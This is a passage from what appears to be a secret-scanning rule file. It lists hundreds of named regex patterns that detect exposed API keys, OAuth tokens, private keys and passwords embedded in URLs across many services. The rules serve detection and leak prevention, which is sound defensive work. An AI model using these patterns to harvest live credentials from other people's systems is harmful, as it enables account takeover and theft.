(?:getsandbox).{0,40}\b([a-z0-9-]{15,30})\b + part: body + - type: regex + name: github_2 + regex: + - \b((?:ghp|gho|ghu|ghs|ghr)_[a-zA-Z0-9]{36,255}\b) + part: body + - type: regex + name: github_app_token + regex: + - (ghu|ghs)_[0-9a-zA-Z]{36} + part: body + - type: regex + name: github_oauth_access_token + regex: + - gho_[0-9a-zA-Z]{36} + part: body + - type: regex + name: github_personal_access_token + regex: + - ghp_[0-9a-zA-Z]{36} + part: body + - type: regex + name: github_refresh_token + regex: + - ghr_[0-9a-zA-Z]{76} + part: body + - type: regex + name: github_old + regex: + - (?:github)[^\.].{0,40}[ =:'"]+([a-f0-9]{40})\b + part: body + - type: regex + name: githubapp_2 + regex: + - >- + (?:github).{0,40}(-----BEGIN RSA PRIVATE + KEY-----\s[A-Za-z0-9+\/\s]*\s-----END RSA PRIVATE KEY-----) + part: body + - type: regex + name: gitlabv2 + regex: + - \b(glpat-[a-zA-Z0-9\-=_]{20,22})\b + part: body + - type: regex + name: gitter + regex: + - (?:gitter).{0,40}\b([a-z0-9-]{40})\b + part: body + - type: regex + name: glassnode + regex: + - (?:glassnode).{0,40}\b([0-9A-Za-z]{27})\b + part: body + - type: regex + name: gocanvas_1 + regex: + - (?:gocanvas).{0,40}\b([0-9A-Za-z/+]{43}=[ \r\n]{1}) + part: body + - type: regex + name: gocanvas_2 + regex: + - (?:gocanvas).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b + part: body + - type: regex + name: gocardless + regex: + - \b(live_[0-9A-Za-z\_\-]{40}[ "'\r\n]{1}) + part: body + - type: regex + name: goodday + regex: + - (?:goodday).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: google_gcp_service_account + regex: + - '"type": "service_account"' + part: body + - type: regex + name: google_api_key + regex: + - AIza[0-9a-z-_]{35} + part: body + - type: regex + name: google_calendar_uri + regex: + - https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+ + part: body + - type: regex + name: google_oauth_access_token + regex: + - ya29\.[0-9A-Za-z\-_]+ + part: body + - type: regex + name: graphcms_1 + regex: + - (?:graph).{0,40}\b([a-z0-9]{25})\b + part: body + - type: regex + name: graphcms_2 + regex: + - \b(ey[a-zA-Z0-9]{73}.ey[a-zA-Z0-9]{365}.[a-zA-Z0-9_-]{683})\b + part: body + - type: regex + name: graphhopper + regex: + - (?:graphhopper).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: groovehq + regex: + - (?:groove).{0,40}\b([a-z0-9A-Z]{64}) + part: body + - type: regex + name: guru_1 + regex: + - >- + (?:guru).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: guru_2 + regex: + - >- + (?:guru).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: gyazo + regex: + - (?:gyazo).{0,40}\b([0-9A-Za-z-]{43})\b + part: body + - type: regex + name: happi + regex: + - (?:happi).{0,40}\b([a-zA-Z0-9]{56}) + part: body + - type: regex + name: happyscribe + regex: + - (?:happyscribe).{0,40}\b([0-9a-zA-Z]{24})\b + part: body + - type: regex + name: harvest_1 + regex: + - (?:harvest).{0,40}\b([a-z0-9A-Z._]{97})\b + part: body + - type: regex + name: hellosign + regex: + - (?:hellosign).{0,40}\b([a-zA-Z-0-9/+]{64})\b + part: body + - type: regex + name: helpcrunch + regex: + - (?:helpcrunch).{0,40}\b([a-zA-Z-0-9+/=]{328}) + part: body + - type: regex + name: helpscout + regex: + - (?:helpscout).{0,40}\b([A-Za-z0-9]{56})\b + part: body + - type: regex + name: hereapi + regex: + - (?:hereapi).{0,40}\b([a-zA-Z0-9\S]{43})\b + part: body + - type: regex + name: heroku + regex: + - >- + (?:heroku).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: hive_2 + regex: + - (?:hive).{0,40}\b([0-9A-Za-z]{17})\b + part: body + - type: regex + name: hiveage + regex: + - (?:hiveage).{0,40}\b([0-9A-Za-z\_\-]{20})\b + part: body + - type: regex + name: holidayapi + regex: + - (?:holidayapi).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: html2pdf + regex: + - (?:html2pdf).{0,40}\b([a-zA-Z0-9]{64})\b + part: body + - type: regex + name: hubspotapikey + regex: + - >- + (?:hubspot).{0,40}\b([A-Za-z0-9]{8}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{12})\b + part: body + - type: regex + name: humanity + regex: + - (?:humanity).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: hypertrack_1 + regex: + - (?:hypertrack).{0,40}\b([0-9a-zA-Z\_\-]{54})\b + part: body + - type: regex + name: hypertrack_2 + regex: + - (?:hypertrack).{0,40}\b([0-9a-zA-Z\_\-]{27})\b + part: body + - type: regex + name: ibmclouduserkey + regex: + - (?:ibm).{0,40}\b([A-Za-z0-9_-]{44})\b + part: body + - type: regex + name: iconfinder + regex: + - (?:iconfinder).{0,40}\b([a-zA-Z0-9]{64})\b + part: body + - type: regex + name: iexcloud + regex: + - (?:iexcloud).{0,40}\b([a-z0-9_]{35})\b + part: body + - type: regex + name: imagekit + regex: + - (?:imagekit).{0,40}\b([a-zA-Z0-9_=]{36}) + part: body + - type: regex + name: imagga + regex: + - (?:imagga).{0,40}\b([a-z0-9A-Z=]{72}) + part: body + - type: regex + name: impala + regex: + - (?:impala).{0,40}\b([0-9A-Za-z_]{46})\b + part: body + - type: regex + name: insightly + regex: + - (?:insightly).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: integromat + regex: + - (?:integromat).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: intrinio + regex: + - (?:intrinio).{0,40}\b([a-zA-Z0-9]{44})\b + part: body + - type: regex + name: invoiceocean_1 + regex: + - (?:invoiceocean).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: invoiceocean_2 + regex: + - \b([0-9a-z]{1,}.invoiceocean.com)\b + part: body + - type: regex + name: ipapi + regex: + - (?:ipapi).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: ipgeolocation + regex: + - (?:ipgeolocation).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: ipify + regex: + - (?:ipify).{0,40}\b([a-zA-Z0-9_-]{32})\b + part: body + - type: regex + name: ipinfodb + regex: + - (?:ipinfodb).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: ipquality + regex: + - (?:ipquality).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: ipstack + regex: + - (?:ipstack).{0,40}\b([a-fA-f0-9]{32})\b + part: body + - type: regex + name: jdbc_connection_string + regex: + - jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+ + part: body + - type: regex + name: jiratoken_1 + regex: + - (?:jira).{0,40}\b([a-zA-Z-0-9]{24})\b + part: body + - type: regex + name: jiratoken_2 + regex: + - (?:jira).{0,40}\b([a-zA-Z-0-9]{5,24}\@[a-zA-Z-0-9]{3,16}\.com)\b + part: body + - type: regex + name: jotform + regex: + - (?:jotform).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: jumpcloud + regex: + - (?:jumpcloud).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: juro + regex: + - (?:juro).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: kanban_1 + regex: + - (?:kanban).{0,40}\b([0-9A-Z]{12})\b + part: body + - type: regex + name: kanban_2 + regex: + - \b([0-9a-z]{1,}.kanbantool.com)\b + part: body + - type: regex + name: karmacrm + regex: + - (?:karma).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: keenio_1 + regex: + - (?:keen).{0,40}\b([0-9a-z]{24})\b + part: body + - type: regex + name: keenio_2 + regex: + - (?:keen).{0,40}\b([0-9A-Z]{64})\b + part: body + - type: regex + name: kickbox + regex: + - (?:kickbox).{0,40}\b([a-zA-Z0-9_]+[a-zA-Z0-9]{64})\b + part: body + - type: regex + name: klipfolio + regex: + - (?:klipfolio).{0,40}\b([0-9a-f]{40})\b + part: body + - type: regex + name: kontent + regex: + - (?:kontent).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: kraken_1 + regex: + - (?:kraken).{0,40}\b([0-9A-Za-z\/\+=]{56}[ "'\r\n]{1}) + part: body + - type: regex + name: kraken_2 + regex: + - (?:kraken).{0,40}\b([0-9A-Za-z\/\+=]{86,88}[ "'\r\n]{1}) + part: body + - type: regex + name: kucoin_1 + regex: + - (?:kucoin).{0,40}([ \r\n]{1}[!-~]{7,32}[ \r\n]{1}) + part: body + - type: regex + name: kucoin_2 + regex: + - >- + (?:kucoin).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: kucoin_3 + regex: + - (?:kucoin).{0,40}\b([0-9a-f]{24})\b + part: body + - type: regex + name: kylas + regex: + - (?:kylas).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: languagelayer + regex: + - (?:languagelayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: lastfm + regex: + - (?:lastfm).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: launchdarkly + regex: + - (?:launchdarkly).{0,40}\b([a-z0-9-]{40})\b + part: body + - type: regex + name: leadfeeder + regex: + - (?:leadfeeder).{0,40}\b([a-zA-Z0-9-]{43})\b + part: body + - type: regex + name: lendflow + regex: + - >- + (?:lendflow).{0,40}\b([a-zA-Z0-9]{36}\.[a-zA-Z0-9]{235}\.[a-zA-Z0-9]{32}\-[a-zA-Z0-9]{47}\-[a-zA-Z0-9_]{162}\-[a-zA-Z0-9]{42}\-[a-zA-Z0-9_]{40}\-[a-zA-Z0-9_]{66}\-[a-zA-Z0-9_]{59}\-[a-zA-Z0-9]{7}\-[a-zA-Z0-9_]{220})\b + part: body + - type: regex + name: lexigram + regex: + - (?:lexigram).{0,40}\b([a-zA-Z0-9\S]{301})\b + part: body + - type: regex + name: linearapi + regex: + - \b(lin_api_[0-9A-Za-z]{40})\b + part: body + - type: regex + name: linemessaging + regex: + - (?:line).{0,40}\b([A-Za-z0-9+/]{171,172})\b + part: body + - type: regex + name: linenotify + regex: + - (?:linenotify).{0,40}\b([0-9A-Za-z]{43})\b + part: body + - type: regex + name: linkpreview + regex: + - (?:linkpreview).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: liveagent + regex: + - (?:liveagent).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: livestorm + regex: + - >- + (?:livestorm).{0,40}\b(eyJhbGciOiJIUzI1NiJ9\.eyJhdWQiOiJhcGkubGl2ZXN0b3JtLmNvIiwianRpIjoi[0-9A-Z-a-z]{134}\.[0-9A-Za-z\-\_]{43}[ + \r\n]{1}) + part: body + - type: regex + name: locationiq + regex: + - \b(pk\.[a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: loginradius + regex: + - >- + (?:loginradius).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: lokalisetoken + regex: + - (?:lokalise).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: loyverse + regex: + - (?:loyverse).{0,40}\b([0-9-a-z]{32})\b + part: body + - type: regex + name: luno_1 + regex: + - (?:luno).{0,40}\b([a-z0-9]{13})\b + part: body + - type: regex + name: luno_2 + regex: + - (?:luno).{0,40}\b([a-zA-Z0-9_-]{43})\b + part: body + - type: regex + name: macaddress + regex: + - (?:macaddress).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: madkudu + regex: + - (?:madkudu).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: magnetic + regex: + - >- + (?:magnetic).{0,40}\b([0-9Aa-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: mailchimp_api_key + regex: + - '[0-9a-f]{32}-us[0-9]{1,2}' + part: body + - type: regex + name: mailboxlayer + regex: + - (?:mailboxlayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: mailerlite + regex: + - (?:mailerlite).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: mailgun_2 + regex: + - (?:mailgun).{0,40}\b([a-zA-Z-0-9]{72})\b + part: body + - type: regex + name: mailgun_api_key_1 + regex: + - key-[0-9a-zA-Z]{32} + part: body + - type: regex + name: mailjetbasicauth + regex: + - (?:mailjet).{0,40}\b([A-Za-z0-9]{87}\=) + part: body + - type: regex + name: mailjetsms + regex: + - (?:mailjet).{0,40}\b([A-Za-z0-9]{32})\b + part: body + - type: regex + name: mailmodo + regex: + - >- + (?:mailmodo).{0,40}\b([A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7})\b + part: body + - type: regex + name: mailsac + regex: + - (?:mailsac).{0,40}\b(k_[0-9A-Za-z]{36,})\b + part: body + - type: regex + name: mandrill + regex: + - (?:mandrill).{0,40}\b([A-Za-z0-9_-]{22})\b + part: body + - type: regex + name: mapbox_2 + regex: + - \b(sk\.[a-zA-Z-0-9\.]{80,240})\b + part: body + - type: regex + name: mapquest + regex: + - (?:mapquest).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: marketstack + regex: + - (?:marketstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: mattermostpersonaltoken_1 + regex: + - (?:mattermost).{0,40}\b([A-Za-z0-9-_]{1,}.cloud.mattermost.com)\b + part: body + - type: regex + name: mattermostpersonaltoken_2 + regex: + - (?:mattermost).{0,40}\b([a-z0-9]{26})\b + part: body + - type: regex + name: mavenlink + regex: + - (?:mavenlink).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: maxmindlicense_1 + regex: + - (?:maxmind|geoip).{0,40}\b([0-9A-Za-z]{16})\b + part: body + - type: regex + name: maxmindlicense_2 + regex: + - (?:maxmind|geoip).{0,40}\b([0-9]{2,7})\b + part: body + - type: regex + name: meaningcloud + regex: + - (?:meaningcloud).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: mediastack + regex: + - (?:mediastack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: meistertask + regex: + - (?:meistertask).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: mesibo + regex: + - (?:mesibo).{0,40}\b([0-9A-Za-z]{64})\b + part: body + - type: regex + name: messagebird + regex: + - (?:messagebird).{0,40}\b([A-Za-z0-9_-]{25})\b + part: body + - type: regex + name: metaapi_1 + regex: + - (?:metaapi|meta-api).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: metaapi_2 + regex: + - (?:metaapi|meta-api).{0,40}\b([0-9a-f]{24})\b + part: body + - type: regex + name: metrilo + regex: + - (?:metrilo).{0,40}\b([a-z0-9]{16})\b + part: body + - type: regex + name: microsoftteamswebhook + regex: + - >- + (https:\/\/[a-zA-Z-0-9]+\.webhook\.office\.com\/webhookb2\/[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12}\@[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12}\/IncomingWebhook\/[a-zA-Z-0-9]{32}\/[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12}) + part: body + - type: regex + name: midise + regex: + - midi-662b69edd2[a-zA-Z0-9]{54} + part: body + - type: regex + name: mindmeister + regex: + - (?:mindmeister).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: mite_1 + regex: + - (?:mite).{0,40}\b([0-9a-z]{16})\b + part: body + - type: regex + name: mite_2 + regex: + - \b([0-9a-z-]{1,}.mite.yo.lk)\b + part: body + - type: regex + name: mixmax + regex: + - (?:mixmax).{0,40}\b([a-zA-Z0-9_-]{36})\b + part: body + - type: regex + name: mixpanel_1 + regex: + - (?:mixpanel).{0,40}\b([a-zA-Z0-9.-]{30,40})\b + part: body + - type: regex + name: mixpanel_2 + regex: + - (?:mixpanel).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: moderation + regex: + - >- + (?:moderation).{0,40}\b([a-zA-Z0-9]{36}\.[a-zA-Z0-9]{115}\.[a-zA-Z0-9_]{43})\b + part: body + - type: regex + name: monday + regex: + - (?:monday).{0,40}\b(ey[a-zA-Z0-9_.]{210,225})\b + part: body + - type: regex + name: moonclerck + regex: + - (?:moonclerck).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: moonclerk + regex: + - (?:moonclerk).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: moosend + regex: + - >- + (?:moosend).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: mrticktock_1 + regex: + - (?:mrticktock).{0,40}\b([a-zA-Z0-9!=@#$%()_^]{1,50}) + part: body + - type: regex + name: myintervals + regex: + - (?:myintervals).{0,40}\b([0-9a-z]{11})\b + part: body + - type: regex + name: nasdaqdatalink + regex: + - (?:nasdaq).{0,40}\b([a-zA-Z0-9_-]{20})\b + part: body + - type: regex + name: nethunt_1 + regex: + - (?:nethunt).{0,40}\b([a-zA-Z0-9.-@]{25,30})\b + part: body + - type: regex + name: nethunt_2 + regex: + - (?:nethunt).{0,40}\b([a-z0-9-\S]{36})\b + part: body + - type: regex + name: netlify + regex: + - (?:netlify).{0,40}\b([A-Za-z0-9_-]{43,45})\b + part: body + - type: regex + name: neutrinoapi_1 + regex: + - (?:neutrinoapi).{0,40}\b([a-zA-Z0-9]{48})\b + part: body + - type: regex + name: neutrinoapi_2 + regex: + - (?:neutrinoapi).{0,40}\b([a-zA-Z0-9]{6,24})\b + part: body + - type: regex + name: newrelic_admin_api_key + regex: + - NRAA-[a-f0-9]{27} + part: body + - type: regex + name: newrelic_insights_api_key + regex: + - NRI(?:I|Q)-[A-Za-z0-9\-_]{32} + part: body + - type: regex + name: newrelic_rest_api_key + regex: + - NRRA-[a-f0-9]{42} + part: body + - type: regex + name: newrelic_synthetics_location_key + regex: + - NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31} + part: body + - type: regex + name: newrelicpersonalapikey + regex: + - (?:newrelic).{0,40}\b([A-Za-z0-9_\.]{4}-[A-Za-z0-9_\.]{42})\b + part: body + - type: regex + name: newsapi + regex: + - (?:newsapi).{0,40}\b([a-z0-9]{32}) + part: body + - type: regex + name: newscatcher + regex: + - (?:newscatcher).{0,40}\b([0-9A-Za-z_]{43})\b + part: body + - type: regex + name: nexmoapikey_1 + regex: + - (?:nexmo).{0,40}\b([A-Za-z0-9_-]{8})\b + part: body + - type: regex + name: nexmoapikey_2 + regex: + - (?:nexmo).{0,40}\b([A-Za-z0-9_-]{16})\b + part: body + - type: regex + name: nftport + regex: + - >- + (?:nftport).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: nicereply + regex: + - (?:nicereply).{0,40}\b([0-9a-f]{40})\b + part: body + - type: regex + name: nimble + regex: + - (?:nimble).{0,40}\b([a-zA-Z0-9]{30})\b + part: body + - type: regex + name: nitro + regex: + - (?:nitro).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: noticeable + regex: + - (?:noticeable).{0,40}\b([0-9a-zA-Z]{20})\b + part: body + - type: regex + name: notion + regex: + - \b(secret_[A-Za-z0-9]{43})\b + part: body + - type: regex + name: nozbeteams + regex: + - >- + (?:nozbe|nozbeteams).{0,40}\b([0-9A-Za-z]{16}_[0-9A-Za-z\-_]{64}[ + \r\n]{1}) + part: body + - type: regex + name: numverify + regex: + - (?:numverify).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: nutritionix_1 + regex: + - (?:nutritionix).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: nutritionix_2 + regex: + - (?:nutritionix).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: nylas + regex: + - (?:nylas).{0,40}\b([0-9A-Za-z]{30})\b + part: body + - type: regex + name: oanda + regex: + - (?:oanda).{0,40}\b([a-zA-Z0-9]{24})\b + part: body + - type: regex + name: omnisend + regex: + - (?:omnisend).{0,40}\b([a-z0-9A-Z-]{75})\b + part: body + - type: regex + name: onedesk_1 + regex: + - (?:onedesk).{0,40}\b([a-zA-Z0-9!=@#$%^]{8,64}) + part: body + - type: regex + name: onelogin_2 + regex: + - secret[a-zA-Z0-9_' "=]{0,20}([a-z0-9]{64}) + part: body + - type: regex + name: onepagecrm_1 + regex: + - (?:onepagecrm).{0,40}\b([a-zA-Z0-9=]{44}) + part: body + - type: regex + name: onepagecrm_2 + regex: + - (?:onepagecrm).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: onwaterio + regex: + - (?:onwater).{0,40}\b([a-zA-Z0-9_-]{20})\b + part: body + - type: regex + name: oopspam + regex: + - (?:oopspam).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: opencagedata + regex: + - (?:opencagedata).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: opengraphr + regex: + - (?:opengraphr).{0,40}\b([0-9Aa-zA-Z]{80})\b + part: body + - type: regex + name: openuv + regex: + - (?:openuv).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: openweather + regex: + - (?:openweather).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: optimizely + regex: + - (?:optimizely).{0,40}\b([0-9A-Za-z-:]{54})\b + part: body + - type: regex + name: owlbot + regex: + - (?:owlbot).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: pgp_private_key_block + regex: + - '-----BEGIN PGP PRIVATE KEY BLOCK-----' + part: body + - type: regex + name: pagerdutyapikey + regex: + - >- + (?:pagerduty).{0,40}\b([a-z]{1}\+[a-zA-Z]{9}\-[a-z]{2}\-[a-z0-9]{5})\b + part: body + - type: regex + name: pandadoc + regex: + - (?:pandadoc).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: pandascore + regex: + - (?:pandascore).{0,40}([ \r\n]{0,1}[0-9A-Za-z\-\_]{51}[ \r\n]{1}) + part: body + - type: regex + name: paralleldots + regex: + - (?:paralleldots).{0,40}\b([0-9A-Za-z]{43})\b + part: body + - type: regex + name: partnerstack + regex: + - (?:partnerstack).{0,40}\b([0-9A-Za-z]{64})\b + part: body + - type: regex + name: passbase + regex: + - (?:passbase).{0,40}\b([a-zA-Z0-9]{128})\b + part: body + - type: regex + name: password_in_url + regex: + - '[a-zA-Z]{3,10}://[^/\s:@]{3,20}:[^/\s:@]{3,20}@.{1,100}["''\s]' + part: body + - type: regex + name: pastebin + regex: + - (?:pastebin).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: paypal_braintree_access_token + regex: + - access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32} + part: body + - type: regex + name: paymoapp + regex: + - (?:paymoapp).{0,40}\b([a-zA-Z0-9]{44})\b + part: body + - type: regex + name: paymongo + regex: + - (?:paymongo).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: paystack + regex: + - \b(sk\_[a-z]{1,}\_[A-Za-z0-9]{40})\b + part: body + - type: regex + name: pdflayer + regex: + - (?:pdflayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: pdfshift + regex: + - (?:pdfshift).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: peopledatalabs + regex: + - (?:peopledatalabs).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: pepipost + regex: + - (?:pepipost|netcore).{0,40}\b([a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: picatic_api_key + regex: + - sk_live_[0-9a-z]{32} + part: body + - type: regex + name: pipedream + regex: + - (?:pipedream).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: pipedrive + regex: + - (?:pipedrive).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: pivotaltracker + regex: + - (?:pivotal).{0,40}([a-z0-9]{32}) + part: body + - type: regex + name: pixabay + regex: + - (?:pixabay).{0,40}\b([a-z0-9-]{34})\b + part: body + - type: regex + name: plaidkey_1 + regex: + - (?:plaid).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: plaidkey_2 + regex: + - (?:plaid).{0,40}\b([a-z0-9]{30})\b + part: body + - type: regex + name: planviewleankit_1 + regex: + - (?:planviewleankit|planview).{0,40}\b([0-9a-f]{128})\b + part: body + - type: regex + name: planviewleankit_2 + regex: + - >- + (?:planviewleankit|planview).{0,40}(?:subdomain).\b([a-zA-Z][a-zA-Z0-9.-]{1,23}[a-zA-Z0-9])\b + part: body + - type: regex + name: planyo + regex: + - (?:planyo).{0,40}\b([0-9a-z]{62})\b + part: body + - type: regex + name: plivo_1 + regex: + - (?:plivo).{0,40}\b([A-Za-z0-9_-]{40})\b + part: body + - type: regex + name: plivo_2 + regex: + - (?:plivo).{0,40}\b([A-Z]{20})\b + part: body + - type: regex + name: poloniex_1 + regex: + - (?:poloniex).{0,40}\b([0-9a-f]{128})\b + part: body + - type: regex + name: poloniex_2 + regex: + - >- + (?:poloniex).{0,40}\b([0-9A-Z]{8}-[0-9A-Z]{8}-[0-9A-Z]{8}-[0-9A-Z]{8})\b + part: body + - type: regex + name: polygon + regex: + - (?:polygon).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: positionstack + regex: + - (?:positionstack).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: postageapp + regex: + - (?:postageapp).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: posthog + regex: + - \b(phc_[a-zA-Z0-9_]{43})\b + part: body + - type: regex + name: postman + regex: + - \b(PMAK-[a-zA-Z-0-9]{59})\b + part: body + - type: regex + name: postmark + regex: + - >- + (?:postmark).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: powrbot + regex: + - (?:powrbot).{0,40}\b([a-z0-9A-Z]{40})\b + part: body + - type: regex + name: privatekey + regex: + - >- + -----\s*?BEGIN[ A-Z0-9_-]*?PRIVATE KEY\s*?-----[\s\S]*?----\s*?END[ + A-Z0-9_-]*? PRIVATE KEY\s*?----- + part: body + - type: regex + name: prospectcrm + regex: + - (?:prospect).{0,40}\b([a-z0-9-]{32})\b + part: body + - type: regex + name: prospectio + regex: + - (?:prospect).{0,40}\b([a-z0-9A-Z-]{50})\b + part: body + - type: regex + name: protocolsio + regex: + - (?:protocols).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: proxycrawl + regex: + - (?:proxycrawl).{0,40}\b([a-zA-Z0-9_]{22})\b + part: body + - type: regex + name: pubnubpublishkey_1 + regex: + - >- + \b(sub-c-[0-9a-z]{8}-[a-z]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: pubnubpublishkey_2 + regex: + - >- + \b(pub-c-[0-9a-z]{8}-[0-9a-z]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: purestake + regex: + - (?:purestake).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: pushbulletapikey + regex: + - (?:pushbullet).{0,40}\b([A-Za-z0-9_\.]{34})\b + part: body + - type: regex + name: pusherchannelkey_2 + regex: + - (?:pusher).{0,40}\b([a-z0-9]{20})\b + part: body + - type: regex + name: pusherchannelkey_3 + regex: + - (?:pusher).{0,40}\b([0-9]{7})\b + part: body + - type: regex + name: pypi_upload_token + regex: + - pypi-AgEIcHlwaS5vcmc[A-Za-z0-9-_]{50,1000} + part: body + - type: regex + name: qualaroo + regex: + - (?:qualaroo).{0,40}\b([a-z0-9A-Z=]{64}) + part: body + - type: regex + name: qubole + regex: + - (?:qubole).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: quickmetrics + regex: + - (?:quickmetrics).{0,40}\b([a-zA-Z0-9_-]{22})\b + part: body + - type: regex + name: rkcs8 + regex: + - '-----BEGIN PRIVATE KEY-----' + part: body + - type: regex + name: rsa_private_key + regex: + - '-----BEGIN RSA PRIVATE KEY-----' + part: body + - type: regex + name: rapidapi + regex: + - (?:rapidapi).{0,40}\b([A-Za-z0-9_-]{50})\b + part: body + - type: regex + name: raven + regex: + - (?:raven).{0,40}\b([A-Z0-9-]{16})\b + part: body + - type: regex + name: rawg + regex: + - (?:rawg).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: razorpay_1 + regex: + - \brzp_\w{2,6}_\w{10,20}\b + part: body + - type: regex + name: readme + regex: + - (?:readme).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: reallysimplesystems + regex: + - \b(ey[a-zA-Z0-9-._]{153}.ey[a-zA-Z0-9-._]{916,1000})\b + part: body + - type: 